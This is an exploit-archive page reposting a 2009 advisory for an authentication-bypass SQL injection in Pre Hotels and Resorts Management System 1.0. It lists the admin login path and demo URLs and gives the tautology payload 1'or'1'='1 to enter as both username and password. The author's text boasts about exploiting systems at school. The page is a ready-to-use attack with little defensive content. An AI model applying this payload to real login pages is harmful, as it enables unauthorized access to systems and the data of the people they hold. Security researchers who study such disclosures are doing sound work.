what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Pre Hotels And Resorts Management System SQL Injection

Pre Hotels And Resorts Management System SQL Injection
Posted Dec 21, 2009
Authored by Packetdeath | Site ssteam.ws

Pre Hotels and Resorts Management System suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection
SHA-256 | ccd917de16ae006850643af05572a502b28ab5ee8e16c9aa5a745eff9ef5628a

Pre Hotels And Resorts Management System SQL Injection

Change Mirror Download

____ _ ____ _ __ U _____ u _____ ____ U _____ u _ _____ _ _
U| _"\ uU /"\ uU /"___| |"|/ / \| ___"|/|_ " _|| _"\ \| ___"|/U /"\ u |_ " _| |'| |'|
\| |_) |/ \/ _ \/ \| | u | ' / | _|" | | /| | | | | _|" \/ _ \/ | | /| |_| |\
| __/ / ___ \ | |/__U/| . \\u | |___ /| |\U| |_| |\| |___ / ___ \ /| |\ U| _ |u
|_| /_/ \_\ \____| |_|\_\ |_____| u |_|U |____/ u|_____| /_/ \_\ u |_|U |_| |_|
||>>_ \\ >> _// \\,-,>> \\,-.<< >> _// \\_ |||_ << >> \\ >> _// \\_ // \\
(__)__) (__) (__)__)(__)\.) (_/(__) (__)__) (__)__)_) (__) (__)(__) (__)__) (__)_") ("_)
--------------------------------------------------------------------------------------------------
Author: Packetdeath
Homepage: www.it-security.biz
D/T: 12:54 PM 12/18/2009
Contact: yaii_abc@hotmail.com
--------------------------------------------------------------------------------------------------
Target: PRE HOTELS & RESORTS MANAGEMENT SYSTEM [login bypass VIA SQL iNJECTION]
URL: http://www.preprojects.com/hotel.asp
Demo: http://www.aebest.com/home/home.asp
Admin demo: http://www.aebest.com/trial_admin/admin_login.asp

Version: 1.0
Price: $44.00
^^ And we paid for security?
------------------------------------------------------------------------
Tested on XP/SP3 [EN]
------------------------------------------------------------------------
Side note: bi0 is the shit, and exploiting at school is fun.
------------------------------------------------------------------------
Greetz: bi0, Annexxempire, code4fun, Lo$er, c0nd0m, sp1r1t, Cr0nix
Rest in peace Rock4Ever! You will be missed. from your family at SSTeam.
------------------------------------------------------------------------

Exploit:

http://[server]/[path]/admin_login.asp

Navagate to login page and enter:

Username: 1'or'1'='1
Password: 1'or'1'='1

------------------------------------------------------------------------

becuase 1 is always equal to 1.... Pools Closed, LOL!!!!!
Wha

/Packetdeath







Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close